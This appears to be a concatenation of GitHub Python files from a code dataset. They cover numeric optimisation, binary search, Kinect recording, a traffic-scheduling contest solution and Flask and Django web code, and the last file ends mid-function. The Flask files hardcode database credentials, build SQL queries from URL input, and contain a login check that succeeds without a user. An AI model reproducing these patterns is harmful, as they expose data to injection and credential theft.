data_file.close()\n\n text,ratio = process.extractOne(text.lower(), terms.keys())\n print(text)\n return terms.get(text, \"Tip not found.\")\n","repo_name":"pierut/robocop4","sub_path":"plugins/private_win10.py","file_name":"private_win10.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"28714177451","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 22 23:48:55 2022\r\n\r\n@author: yonau\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\ndef fonction(x):\r\n return x**5 -5*x**3 -20*x +5\r\n\r\ndef signeplz(x,s,signe):\r\n \"\"\"\r\n La fonction signeplz renvoie le sens d'exécution: \r\n vers la droite ou vers la gauche. \r\n \r\n \"\"\"\r\n \r\n if signe == '+':\r\n #si on va dans le sens + (à droite) : x_i=x_(i-1)+s\r\n return x+s\r\n else:\r\n #si on va dans le sens -(à gauche): x_i=x_(i-1)-s\r\n return x-s\r\n \r\ndef pas_fixe(x0,s,optimum):\r\n \"\"\"\r\n La fonction pas_fixe est une méthode d'optimisation qui permet de retourner \r\n le point x_i (ou x*) qui peut être considéré comme point optimal.\r\n L'optimum peut être un point de maximisation ou de minimisation. \r\n La fonction pas_fixe admet l'unimodalité de la fonction définie précédemment'\r\n \r\n INPUT x0: point de départ\r\n INPUT s: pas fixe \r\n INPUT optimum: maximisation ou minimisation \r\n OUTPUT table: tableau des itérations et résultat final de l'optimisation'\r\n \r\n \"\"\"\r\n x = x0\r\n initilisation = fonction(x0+s)\r\n \r\n if optimum == 'mini':\r\n if initilisation < fonction(x0):\r\n signe = '+'\r\n else:\r\n signe = '-' \r\n \r\n elif optimum == 'maxi':\r\n if initilisation < fonction(x0):\r\n signe = '-'\r\n else:\r\n signe = '+'\r\n \r\n liste_antecedants = []\r\n liste_images = []\r\n \r\n if optimum == 'mini':\r\n #pour une minimisation\r\n while fonction(signeplz(x,s,signe)) < fonction(x):\r\n liste_antecedants.append(x)\r\n liste_images.append(fonction(x))\r\n x = signeplz(x,s,signe) \r\n \r\n liste_antecedants.append(x)\r\n liste_images.append(fonction(x))\r\n x = signeplz(x,s,signe)\r\n liste_antecedants.append(x)\r\n liste_images.append(fonction(x))\r\n i = liste_images.index(min(liste_images)) \r\n \r\n elif optimum == 'maxi':\r\n #pour une maximisation\r\n while fonction(signeplz(x,s,signe)) > fonction(x):\r\n liste_antecedants.append(x)\r\n liste_images.append(fonction(x))\r\n x = signeplz(x,s,signe)\r\n \r\n liste_antecedants.append(x)\r\n liste_images.append(fonction(x))\r\n x = signeplz(x,s,signe)\r\n liste_antecedants.append(x)\r\n liste_images.append(fonction(x))\r\n i = liste_images.index(max(liste_images))\r\n \r\n table=np.zeros((len(liste_images),4))\r\n \r\n \r\n if optimum == 'mini':\r\n print('\\n************ MINIMISATION: **********')\r\n #numpy ne permet pas le mélanchge des types str et float alors voici le nom des colonnes:\r\n #la derniere colonne sera le booléen 1 si vrai, 0 si faux\r\n print('\\n','itération_i ','x_i ','f(x_i) ',' f(x_i)>f(x_i)')\r\n for i in range(len(liste_images)):\r\n table[i,0]=i\r\n table[i,1]=liste_antecedants[i]\r\n table[i,2]=liste_images[i]\r\n ouinon=liste_images[i]>liste_images[i-1]\r\n table[i,3]=ouinon\r\n elif optimum == 'maxi':\r\n print('\\n********** MAXIMISATION:*********')\r\n print('\\n','itération_i ','x_i ','f(x_i) ',' f(x_i) matrix[mid][-1]:\n top = mid + 1\n elif target < matrix[mid][0]:\n bot = mid - 1\n else:\n break\n\n\n # Do binary search on the respective matrice\n if not (top <= bot):\n return False\n \n row = (top + bot) // 2\n l, r = 0, COLS - 1\n while l <= r:\n m = (l + r) // 2\n if target > matrix[row][m]:\n l = m + 1\n elif target < matrix[row][m]:\n r = m - 1\n else:\n return True\n return False\n\nmatrix = [[1,3,5,7],[10,11,16,20],[23,30,34,60]]\n\nprint(binary_search_2d(matrix, 8))","repo_name":"Paulvitalis200/Data-Structures","sub_path":"BinaryTrees/binary_search_2d_rev.py","file_name":"binary_search_2d_rev.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19173277442","text":"import pykka\nimport time\n\n\nclass TimerActor(pykka.ThreadingActor):\n \"actor that periodically sends a message to target \\\n inspired by: \\\n https://github.com/jodal/pykka/issues/24\"\n\n def __init__(self, target, sleep_time, event):\n super(TimerActor, self).__init__()\n self.target = target\n self.sleep_time = sleep_time\n self.event = event\n self.running = False\n\n def on_receive(self, msg):\n\n if msg.get('cmd') == 'start':\n self.running = True\n self.trigger()\n elif msg.get('cmd') == 'stop':\n self.running = False\n elif msg.get('cmd') == 'trigger':\n self.trigger()\n\n def trigger(self):\n if not self.running:\n return\n time.sleep(self.sleep_time)\n self.target.tell({'cmd': self.event})\n self.actor_ref.tell({'cmd': 'trigger'})\n","repo_name":"cvra/korra-the-coordinator","sub_path":"korra/TimerActor.py","file_name":"TimerActor.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10718852232","text":"from functools import wraps\n\nfrom flask import g, request, jsonify\n\nfrom .error import Code\n\n\ndef login_required(f):\n @wraps(f)\n def wrapper(*args, **kwargs):\n if g.user is None:\n return jsonify(dict(code=Code.OK.value, msg='ok'))\n return f(*args, **kwargs)\n return wrapper","repo_name":"bithaolee/flask-framework","sub_path":"app/core/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28363288533","text":"\"\"\"\nAuthor: Konstantinos Angelopoulos\nDate: 04/02/2020\nAll rights reserved.\nFeel free to use and modify and if you like it give it a star.\n\"\"\"\n\n# *modified for testing by N. Vickery on 11/7/22\n\nfrom pykinect2 import PyKinectV2\nfrom pykinect2.PyKinectV2 import *\nfrom pykinect2 import PyKinectRuntime\nimport cv2\nimport numpy as np\n\nkinect = PyKinectRuntime.PyKinectRuntime(PyKinectV2.FrameSourceTypes_Depth | PyKinectV2.FrameSourceTypes_Color)\n\n# Define the codec and create VideoWriter object\nfourcc = cv2.VideoWriter_fourcc('X','V','I','D')\ncolor_H,color_W = kinect.color_frame_desc.Height, kinect.color_frame_desc.Width\nrgb_vid = cv2.VideoWriter('rgb_output.mp4', fourcc, 30.0, (color_W,color_H))\nprint(color_H,color_W)\n#depth_vid = cv.VideoWriter('depth_output.avi', fourcc, 30.0, (512, 424))\n# Adjust parameters above for kinect video feed (look it up)\n\nwhile True:\n if kinect.has_new_depth_frame():\n # RGB Image\n color_frame = kinect.get_last_color_frame()\n colorImage = color_frame.reshape((kinect.color_frame_desc.Height, kinect.color_frame_desc.Width, 4)).astype(np.uint8)\n colorImage = cv2.flip(colorImage, 1)\n #print(colorImage.shape)\n img_BGR = cv2.cvtColor(colorImage,cv2.COLOR_RGB2BGR)\n rgb_vid.write(img_BGR)\n #rgb_vid.write(colorImage)\n cv2.imshow('Test Color View', cv2.resize(colorImage, (int(1920 / 2.5), int(1080 / 2.5))))\n # Depth Image\n## depth_frame = kinect.get_last_depth_frame()\n## depth_img = depth_frame.reshape((kinect.depth_frame_desc.Height, kinect.depth_frame_desc.Width)).astype(np.uint16)\n## depth_img = cv2.flip(depth_img, 1)\n## cv2.imshow('Test Depth View', depth_img)\n## depth_vid.write(depth_img)\n # Infared Image\n## infared_frame = kinect.get_last_infared_frame()\n## infared_img = infared_frame.reshape((kinect.infared_frame_desc.Height, kinect.infared_frame_desc.Width)).astype(np.uint8)\n## infared_img = cv2.flip(infared_img, 1)\n## cv2.imshow('Test Infared View', infared_img)\n # print(color_point_2_depth_point(kinect, _DepthSpacePoint, kinect._depth_frame_data, [100, 100]))\n # print(depth_points_2_world_points(kinect, _DepthSpacePoint, [[100, 150], [200, 250]]))\n # print(intrinsics(kinect).FocalLengthX, intrinsics(kinect).FocalLengthY, intrinsics(kinect).PrincipalPointX, intrinsics(kinect).PrincipalPointY)\n # print(intrinsics(kinect).RadialDistortionFourthOrder, intrinsics(kinect).RadialDistortionSecondOrder, intrinsics(kinect).RadialDistortionSixthOrder)\n # print(world_point_2_depth(kinect, _CameraSpacePoint, [0.250, 0.325, 1]))\n # img = depth_2_color_space(kinect, _DepthSpacePoint, kinect._depth_frame_data, show=False, return_aligned_image=True)\n # depth_2_color_space(kinect, _DepthSpacePoint, kinect._depth_frame_data, show=True)\n # img = color_2_depth_space(kinect, _ColorSpacePoint, kinect._depth_frame_data, show=True, return_aligned_image=True)\n\n # Quit using q\n if cv2.waitKey(1) & 0xff == ord('q'):\n break\n\nrgb_vid.release()\n\ncv2.destroyAllWindows()\n","repo_name":"nvickery/CS549---CV-Project-","sub_path":"Archive/Kinect Testing/pykinect2_savingRGBandDepth_test1.py","file_name":"pykinect2_savingRGBandDepth_test1.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"35326259315","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.db.models.functions import Lower\n\nfrom meal.models import (\n COMPONENT_GROUP_CHOICES_MAIN_DISH, Component, Ingredient)\n\n\nclass DishIngredientsForm(forms.Form):\n maindish = forms.ModelChoiceField(\n label=_(\"Today's main dish:\"),\n queryset=Component.objects.order_by(Lower('name')).filter(\n component_group=COMPONENT_GROUP_CHOICES_MAIN_DISH),\n widget=forms.Select(attrs={'class': 'ui dropdown maindish'}),\n )\n\n ingredients = forms.ModelMultipleChoiceField(\n label=_('Select main dish ingredients:'),\n queryset=Ingredient.objects.order_by(Lower('name')).all(),\n widget=forms.SelectMultiple(\n attrs={'class': 'ui fluid search dropdown mainingredients'}),\n required=False,\n )\n\n sides_ingredients = forms.ModelMultipleChoiceField(\n label=_('Select sides ingredients:'),\n queryset=Ingredient.objects.order_by(Lower('name')).all(),\n widget=forms.SelectMultiple(\n attrs={'class': 'ui fluid search dropdown sidesingredients'}),\n required=False,\n )\n\n def clean_sides_ingredients(self):\n data = self.cleaned_data['sides_ingredients']\n if not data:\n raise forms.ValidationError(\n _(\"Please choose some Sides ingredients\"))\n return data\n","repo_name":"savoirfairelinux/sous-chef","sub_path":"src/delivery/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"} +{"seq_id":"17939842501","text":"import logging\nimport sys\nimport HandleFile\nimport GridMap\nimport Graph\nimport Processing\nimport math\n\nlogging.basicConfig(level=logging.DEBUG,\n filename='../logs/CodeCraft-2019.log',\n format='[%(asctime)s] %(levelname)s [%(funcName)s: %(filename)s, %(lineno)d] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filemode='a')\n\n\n# python CodeCraft-2019.py ../config/car.txt ../config/road.txt ../config/cross.txt ../config/presetAnswer.txt ../config/answer.txt\ndef main():\n if len(sys.argv) != 6:\n logging.info('please input args: car_path, road_path, cross_path, answerPath')\n exit(1)\n\n car_path = sys.argv[1]\n road_path = sys.argv[2]\n cross_path = sys.argv[3]\n preset_answer_path = sys.argv[4]\n answer_path = sys.argv[5]\n\n # car_path = \"../config/car.txt\"\n # road_path = \"../config/road.txt\"\n # cross_path = \"../config/cross.txt\"\n # preset_answer_path = \"../config/presetAnswer.txt\"\n # answer_path = \"../config/answer.txt\"\n #\n # car_path = \"../config_1/car.txt\"\n # road_path = \"../config_1/road.txt\"\n # cross_path = \"../config_1/cross.txt\"\n # preset_answer_path = \"../config_1/presetAnswer.txt\"\n # answer_path = \"../config_1/answer.txt\"\n\n logging.info(\"car_path is %s\" % (car_path))\n logging.info(\"road_path is %s\" % (road_path))\n logging.info(\"cross_path is %s\" % (cross_path))\n logging.info(\"preset_answer_path is %s\" % (preset_answer_path))\n logging.info(\"answer_path is %s\" % (answer_path))\n\n # to read input file\n car, road, cross, preset_answer = HandleFile.read_all_data(car_path, road_path, cross_path, preset_answer_path)\n\n # 分开调参,每秒发车数量\n if 90761 in car:\n dis = 1\n step = 82\n step2 = 100\n time_step = 10\n else:\n dis = 2\n step = 64\n step2 = 64\n time_step = 9\n\n car_time = Processing.compute_pre_car(preset_answer, step) # 为预置车辆设置出发时间\n preset_answer_cross = Processing.judge_pre_cross(car, preset_answer, cross) # 预置车辆的方向统计,按时间统计\n\n # 地图一后10%的车辆提出,重新安排路径,地图二不处理预置车辆\n if dis == 1:\n pre_num = 0\n for t in preset_answer:\n pre_num = pre_num + len(preset_answer[t])\n pre_original_num = int(pre_num/10) # 可处理预置车辆的个数\n preset_answer_time = list(preset_answer.keys())\n preset_answer_time.sort(reverse=True)\n pre_original = {} # 可处理预置车辆统计\n end_time = 1000 # 预置车辆最大出发时间(地图2)\n for i in range(len(preset_answer_time)):\n t = preset_answer_time[i]\n if pre_original_num <= 0:\n break\n end_time = t\n pre_original[t] = {}\n if len(preset_answer[t]) <= pre_original_num:\n for key in preset_answer[t]:\n pre_original[t][key] = 0\n pre_original_num = pre_original_num - len(preset_answer[t])\n del preset_answer[t] # 将重新设置路径的预置车辆从preset_answer中删除\n else:\n delete = []\n for key in preset_answer[t]:\n if pre_original_num > 0:\n delete.append(key)\n pre_original[t][key] = 0\n pre_original_num = pre_original_num - 1\n else:\n break\n for j in range(len(delete)):\n key = delete[j]\n del preset_answer[t][key]\n pass\n # process\n map_cross = Graph.build_map_equal(road, cross) # 设置地图\n\n map_grid = GridMap.grid_map(road, cross) # 路口到坐标的映射\n cross_list = GridMap.cross_sort(map_grid) # 对路口进行排序,离得近的路口在排序中离得尽量远\n\n road_importance = Processing.road_import(road) # 每条路的重要性\n time_group, max_time = Processing.time_grouping(car) # 按时间分组结果以及出发的最大时间\n\n # 结果 {车标号:{预计出发时间,[路口],[路径],实际出发时间}}\n answer = Processing.initialize_answer(car)\n\n # 预置车辆最大出发时间(地图2)\n max_pre_time = max(preset_answer_cross.keys())\n shortest_path = Graph.compute_shortest_path(map_cross) # 两个路口之间最短路查询\n car_flag = {} # 当前可出发的全部车辆\n bias = dict(zip(cross.keys(), [0 for n in range(len(cross))])) # 每个路口当前跑的车数\n # 最大出发时间内,按时间迭代\n for t in range(1, max_time + 1):\n print(t)\n # 若当前时间有预置车辆,修改路的权重和bias\n if t in preset_answer:\n Processing.modify_weight(map_cross, preset_answer[t], road, road_importance, car)\n for c in preset_answer_cross[t]:\n bias[c] = bias[c] + preset_answer_cross[t][c]\n # 地图一,修改预置车辆的路径\n if dis == 1:\n if t in pre_original:\n for key in pre_original[t]:\n path = Graph.dijkstra(map_cross, car[key][0], car[key][1])\n l = math.log(len(path[0]) - 1, 7)\n for j in range(len(path[0]) - 1):\n start = path[0][j]\n end = path[0][j + 1]\n map_cross[start][end][0] = map_cross[start][end][0] + road_importance[path[1][j]]\n answer[key] = [car[key][3]]\n answer[key] = answer[key] + path\n answer[key].append(t)\n # 若当前时间有车出发,添加当前可出发辆\n if t in time_group:\n Processing.compute_car_flag(car_flag, car, shortest_path, time_group, t, map_grid)\n # 若预置车辆占了最大出发车辆的名额,不发其它的车\n if car_time[t] >= step:\n continue\n # 当前可出发车辆按照路口分组\n group = Processing.grouping_up_down3(car_flag, cross, car)\n # 按照平均原则补偿bias,出发上或下的车辆\n Processing.modify_answer1(answer, group, car_flag, map_cross, car, step-car_time[t], t, road_importance, bias, cross_list)\n\n group = Processing.grouping_up_down3(car_flag, cross, car)\n # position = dict(zip(map_cross.keys(), [0 for n in range(len(map_cross))]))\n pointer = 0\n for t in range(max_time+1, 10000):\n print(t)\n # 预置车辆全部发完后,增大每秒发车数量\n if dis == 1:\n if t > end_time and t % time_step == 0:\n step = step + 1\n if step > step2:\n step = step2\n else:\n if t > max_pre_time and t % time_step == 0:\n step = step + 1\n if step > step2:\n step = step2\n\n # 若当前时间有预置车辆,修改路的权重和bias\n if t in preset_answer:\n Processing.modify_weight(map_cross, preset_answer[t], road, road_importance, car)\n for c in preset_answer_cross[t]:\n bias[c] = bias[c] + preset_answer_cross[t][c]\n if dis == 1:\n if t in pre_original:\n for key in pre_original[t]:\n path = Graph.dijkstra(map_cross, car[key][0], car[key][1])\n l = math.log(len(path[0]) - 1, 7)\n for j in range(len(path[0]) - 1):\n start = path[0][j]\n end = path[0][j + 1]\n map_cross[start][end][0] = map_cross[start][end][0] + road_importance[path[1][j]]\n answer[key] = [car[key][3]]\n answer[key] = answer[key] + path\n answer[key].append(t)\n # 出发step-car_time[t]的车子\n pointer_s = pointer+step-car_time[t]\n # 按照平均原则补偿bias,出发各个路口的车辆\n flag = Processing.modify_answer2(answer, group, map_cross, car, t, pointer, pointer_s, road_importance, bias, cross_list)\n if flag == 0:\n break\n pointer = pointer_s\n # print(answer)\n\n # to write output file\n HandleFile.write_data(answer, answer_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ttinch/Huawei-CodeCraft2019","sub_path":"SDK_python/CodeCraft-2019/src/CodeCraft-2019.py","file_name":"CodeCraft-2019.py","file_ext":"py","file_size_in_byte":8362,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"5418551553","text":"from flask import Flask, request, jsonify, request, Blueprint\nfrom flask_cors import CORS\nimport mysql.connector as mysql\n\nljManagementFunctions = Blueprint('ljManagementFunctions', __name__)\n\n# enter your server IP address/domain name\nHOST = \"database-1.cmqbhk3xoixj.ap-southeast-1.rds.amazonaws.com\" # or \"domain.com\"\n# database name, if you want just to connect to MySQL server, leave it empty\nDATABASE = \"spmDB\"\n# \"is212_example, spmDB\"\n# this is the user you create\nUSER = \"admin\"\n# user password\nPASSWORD = \"spmspmspm\"\n# connect to MySQL server\ndb_connection = mysql.connect(host=HOST, database=DATABASE, user=USER, password=PASSWORD)\nprint(\"Connected to:\", db_connection.get_server_info())\n# enter your code here!\n\ncursor = db_connection.cursor()\n\nCORS(ljManagementFunctions)\n\n# --------- Staff Learning Journey Creation Functions ---------\n# --------------------------- Start ---------------------------\n# [START] Function to GET all skills based on specified Learning Journey role ID\n@ljManagementFunctions.route(\"/view_skills/\")\ndef view_skills(ljRole_Id):\n # get relevant skills ID matched with roleId\n skillsId = get_skills_id(ljRole_Id)\n \n skillsIdQuery = \"(\"\n for item in skillsId:\n skillsIdQuery += str(item[0]) + \",\"\n skillsIdQuery = skillsIdQuery[:-1]\n skillsIdQuery += \")\"\n # get skills that match skills id retrieved earlier and are active \n query = \"SELECT * FROM Skill WHERE skill_id in\" + str(skillsIdQuery)\n cursor.execute(query)\n skills = cursor.fetchall()\n return jsonify(\n {\n \"data\": skills\n }\n ), 200\n# [END] Function to GET all skills based on specified Learning Journey role ID\n\n# [START] Function to GET active courses based on specified course ID\ndef getCourseByID(course_id):\n query = \"SELECT DISTINCT * FROM Course WHERE course_status='Active'\" + \"AND course_id ='\" + str(course_id)+\"'\"\n cursor.execute(query)\n # print(cursor.fetchall())\n return cursor.fetchall()\n# [END] Function to GET active courses based on specified course ID\n\n# [START] Function to GET courses ID bsed on a specific skill ID\ndef get_course_by_skillId(skillId):\n query = \"SELECT course_id FROM Course_Skill WHERE skill_id=\" + str(skillId)\n cursor.execute(query)\n return cursor.fetchall() \n# [END] Function to GET courses ID based on a specific skill ID\n\n# [START] Function to GET skill description and courses based on a specified skill ID\n@ljManagementFunctions.route(\"/view-course-skills/\")\ndef skill_by_course(skillID):\n courseUnderSkill = get_course_by_skillId(skillID)\n query = \"SELECT skill_desc FROM Skill WHERE skill_id =\" + str(skillID)\n cursor.execute(query)\n skill = cursor.fetchall()\n print(courseUnderSkill)\n courses = []\n for id in courseUnderSkill:\n # check if function returns empty list\n if getCourseByID(id[0]) != []:\n courses.append(getCourseByID(id[0]))\n return jsonify(\n {\n \"data\": courses,\n \"skill\":skill\n }\n )\n# [END] Function to GET courses based on a specified skill ID\n\n# [START] Function to get staff learning journey\ndef get_all_staff_lj(staffId):\n query = \"SELECT * FROM LearningJourney WHERE staff_id=\" + str(staffId)\n cursor.execute(query)\n return cursor.fetchall()\n# [END] Function to get staff learning journey\n\n# [START] Function to GET nested list of Unselected and Selected active roles\n@ljManagementFunctions.route(\"/view_filteredLjRoles/\")\ndef view_filteredRoles(staffId):\n data = get_all_staff_lj(staffId)\n existingRoleId = []\n for i in data:\n existingRoleId.append(i[2])\n # get all active roles where active = 0\n query = \"SELECT * FROM LJRole WHERE status = 1\"\n cursor.execute(query)\n ljRoles = cursor.fetchall()\n ljFilteredRoles = []\n existingRoles = []\n \n for role in ljRoles:\n # get roles that are not in existing learning journeys\n if role[0] not in existingRoleId:\n ljFilteredRoles.append(role)\n else:\n existingRoles.append(role)\n return jsonify(\n {\n \"data\": (ljFilteredRoles, existingRoles)\n }\n ), 200\n# [END] Function to GET nested list of Unselected and Selected active roles\n\n# [START] Function to GET relevant skills ID for a specific role ID\ndef get_skills_id(ljRole_Id):\n query1=\"SELECT skill_id FROM LJRole_Skill WHERE ljrole_id = \" + str(ljRole_Id)\n cursor.execute(query1)\n return cursor.fetchall()\n# [END] Function to GET relevant skills ID for a specific role ID\n\n# [START] Function to GET active skill details for a specified list of skills ID\ndef get_active_skill(skillsId):\n skillsIdQuery = \"(\"\n for item in skillsId:\n skillsIdQuery += str(item[0]) + \",\"\n skillsIdQuery = skillsIdQuery[:-1]\n skillsIdQuery += \")\"\n query = \"SELECT * FROM Skill WHERE status = 1 and skill_id in\" + str(skillsIdQuery)\n cursor.execute(query)\n return cursor.fetchall()\n# [END] Function to GET active skill details for a specified list of skills ID\n\n# [START] Function to GET and Return active skill details for a specified list of skills ID in jsonify\n@ljManagementFunctions.route(\"/view_active_skills/\")\ndef view_active_skills(ljRole_Id):\n # get relevant skills ID matched with roleId\n skillsId = get_skills_id(ljRole_Id)\n \n # get skills that match skills id retrieved earlier and are active \n skills = get_active_skill(skillsId)\n return jsonify(\n {\n \"data\": skills\n }\n ), 200\n# [END] Function to GET and Return active skill details for a specified list of skills ID in jsonify\n\n# [START] Function to GET newly created learning journey ID\ndef getLjId():\n query = \"SELECT MAX(ljourney_id) FROM LearningJourney\"\n cursor.execute(query)\n data = cursor.fetchall()\n id = data[0][0]\n return id\n# [END] Function to GET newly created learning journey ID\n\n# [START] Function to CREATE new learning journey \n@ljManagementFunctions.route(\"/create_lj\", methods=[\"POST\"])\ndef create_lj():\n # check for missing inputs\n data = request.get_json()\n if not all(key in data.keys() for\n key in ('staffId', 'selectedRole', 'selectedCourses')):\n return jsonify({\n \"message\": \"Incorrect JSON object provided.\"\n }), 500\n \n # if form validation succesful\n try:\n staffId = data['staffId']\n selectedRole = data['selectedRole']\n query = \"INSERT INTO LearningJourney (staff_id, ljrole_id, completion_status) VALUES (%s, %s, %s);\"\n\n lj_data = (staffId, selectedRole[0], 'Incomplete')\n cursor.execute(query, lj_data)\n db_connection.commit()\n\n # get new learning journey Id\n newLjId = getLjId()\n\n selectedCourses = data['selectedCourses']\n for course in selectedCourses:\n query2 = \"INSERT INTO LJ_Course VALUES (%s, %s)\"\n course_data = (newLjId, course[0])\n cursor.execute(query2, course_data)\n db_connection.commit()\n\n return \"success\"\n\n except Exception:\n return jsonify({\n \"message\": \"Unable to commit to database.\"\n }), 500\n# [END] Function to CREATE new learning journey \n\n# --------- Staff Learning Journey Creation Functions ---------\n# --------------------------- End -----------------------------\n\n\n# ---------- Staff View ALL Learning Journey Functions ----------\n# --------------------------- Start ---------------------------\n\n# [START] Function to get role name for a specific role ID\ndef get_role_name(roleId):\n query = \"SELECT ljrole_name FROM LJRole WHERE ljrole_id =\" + str(roleId)\n cursor.execute(query)\n ljRoleName = cursor.fetchall()\n ljRoleName = ljRoleName[0][0]\n return ljRoleName\n# [END] Function to get role name for a specific role ID\n\n# [START] Function to view ALL learning journey for a specific staff\n@ljManagementFunctions.route(\"/view_AllLj/\")\ndef get_all_lj(staffId):\n lj_list = get_all_staff_lj(staffId)\n lj_descriptive_list = []\n for lj in lj_list:\n # get ljid\n ljourney_id = lj[0]\n \n data = []\n # get role name\n roleId = lj[2]\n ljRoleName = get_role_name(roleId)\n \n # get relevant skills ID matched with roleId\n skillsId = get_skills_id(roleId)\n\n # get skills that match skills id retrieved earlier and are active \n skills = get_active_skill(skillsId)\n skillNames=\"\"\n for skill in skills:\n if skill != skills[-1]:\n skillNames += (skill[1]) + \", \"\n else:\n skillNames += (skill[1])\n \n # get status\n status = lj[3]\n\n # append as a list to lj_descriptive_list\n data = [ljourney_id, roleId, ljRoleName, skillNames, status]\n lj_descriptive_list.append(data)\n return jsonify(\n {\n \"data\": lj_descriptive_list\n }\n ), 200\n# [END] Function to view ALL learning journey for a specific staff\n# ---------- Staff View ALL Learning Journey Functions ---------\n# --------------------------- End ---------------------------\n\n\n\n# ------- Staff View Learning Journey Details Functions --------\n# --------------------------- Start ---------------------------\n\n# [START] Function to get learning journey courses ID in a specific learning journey\ndef get_lj_courses_id(ljourney_id):\n query = \"SELECT course_id FROM LJ_Course WHERE ljourney_id = \" + str(ljourney_id)\n cursor.execute(query)\n ljCourseIdList= cursor.fetchall()\n return ljCourseIdList\n# [END] Function to get learning journey courses ID in a specific learning journey\n\n# [START] Function to course details based on a specific course ID\ndef get_course_details(courseId):\n query = \"SELECT * from Course WHERE course_status='Active' AND course_id='\" + str(courseId) + \"'\"\n cursor.execute(query)\n return cursor.fetchall()\n# [END] Function to course details based on a specific course ID\n\n# [START] Function to get course registration details for a specific staff ID\ndef get_course_registration_by_staffId(staffId, courseId):\n query = \"SELECT course_id, reg_status, completion_status FROM Registration WHERE staff_id=\" + str(staffId) + \" AND course_id='\" + str(courseId) + \"'\"\n cursor.execute(query)\n return cursor.fetchall()\n# [END] Function to get course registration details for a specific staff ID\n\n# [START] Function to GET courses ID bsed on a specific skill ID\ndef get_course_by_skillId(skillId):\n query = \"SELECT course_id FROM Course_Skill WHERE skill_id=\" + str(skillId)\n cursor.execute(query)\n return cursor.fetchall() \n# [END] Function to GET courses ID based on a specific skill ID\n\n# [START] Function to GET all details (ljourneyId, roleName, skillId, skillName, courseId, courseName, courseDetails) of a specific learning journey ID\n@ljManagementFunctions.route(\"/view_LjDetails/\")\ndef view_LjDetails(ljourney_id):\n ljDetails = get_lj_details(ljourney_id)\n \n roleId = ljDetails[0][2]\n roleName= get_role_name(roleId)\n \n skillsId = get_skills_id(roleId)\n skills = get_active_skill(skillsId)\n skillList = []\n\n # creating skillList where format = [[skillId, skill 1, (acquired/unacquired)], [chosen course names, (completed/ongoing/registered/waitlist/not registered)]]\n for skill in skills:\n skillCourseDetails = []\n courseList = []\n skillId = skill[0]\n \n # get courses under skill ID\n courses_in_skill = get_course_by_skillId(skillId)\n skillAcquired = False\n \n # check if course chosen\n for course in courses_in_skill:\n if course in get_lj_courses_id(ljourney_id):\n courseDetails = (get_course_details(course[0]))\n courseId = courseDetails[0][0]\n courseName = courseDetails[0][1]\n \n # check course status and registration\n # get staffid\n staffId = get_lj_details(ljourney_id)\n staffId = str(staffId[0][1])\n\n # get course status and registration\n courseStatusDetails = get_course_registration_by_staffId(staffId, courseId)\n \n # extract actual status\n if courseStatusDetails == []:\n courseStatus = \"Register Now\"\n else:\n if courseStatusDetails[0][2] == '':\n courseStatus = courseStatusDetails[0][1]\n else:\n courseStatus = courseStatusDetails[0][2]\n\n # match skill acquired with status\n if courseStatus == \"Completed\":\n skillAcquired = True\n courseList.append([courseId, courseName, courseStatus])\n \n skillCourseDetails = [[skillId, skill[1], skillAcquired], courseList]\n skillList.append(skillCourseDetails)\n \n status = ljDetails[0][3]\n result = [ljourney_id, roleName, skillList, status]\n return jsonify(\n {\n \"data\": result\n }\n ), 200\n# [END] Function to GET all details (ljourneyId, roleName, skillId, skillName, courseId, courseName, courseDetails) of a specific learning journey ID\n\n# [START] Function to DELETE a learning journey based on learning journey ID\n@ljManagementFunctions.route(\"/deleteLearningJourney/\", methods=[\"DELETE\"])\ndef deleteLearningJourney(selectedLj):\n if (request.method == 'DELETE'):\n # delete from ljcourse table\n query2 = \"DELETE FROM LJ_Course WHERE ljourney_id =\" + str(selectedLj)\n cursor.execute(query2)\n db_connection.commit()\n\n # delete from learningjourney table\n query = \"DELETE FROM LearningJourney WHERE ljourney_id =\" + str(selectedLj)\n cursor.execute(query)\n db_connection.commit()\n \n return \"success\"\n\n else:\n return jsonify({\n \"message\": \"Unable to commit to database.\"\n }), 500\n# [END] Function to DELETE a learning journey based on learning journey ID\n\n# ------- Staff View Learning Journey Details Functions --------\n# ---------------------------- End -----------------------------\n\n\n# -------- Staff Add Learning Journey Courses Functions ---------\n# ---------------------------- End -----------------------------\n# [START] Function to GET learning journey based on a specific learning journey ID\ndef get_lj_details(ljourney_id):\n query = \"SELECT * FROM LearningJourney WHERE ljourney_id =\" + str(ljourney_id)\n cursor.execute(query)\n return cursor.fetchall()\n# [END] Function to GET learning journey based on a specific learning journey ID\n\n# [START] Function to GET relevant courses that has not been added to a selected learning journey \n@ljManagementFunctions.route(\"/viewCoursesToAdd/\")\ndef viewCoursesToAdd(ljourney_id):\n ljDetails = get_lj_details(ljourney_id)\n \n roleId = ljDetails[0][2]\n roleName= get_role_name(roleId)\n \n skillsId = get_skills_id(roleId)\n skills = get_active_skill(skillsId)\n print(skills)\n skillList = []\n\n # creating skillList where format = [[skillId, skill 1, (acquired/unacquired)], [chosen course names, (completed/ongoing/registered/waitlist/not registered)]]\n for skill in skills:\n skillCourseDetails = []\n courseList = []\n skillId = skill[0]\n \n # get courses under skill\n courses_in_skill = get_course_by_skillId(skillId)\n \n # check if course not chosen\n for course in courses_in_skill:\n if course not in 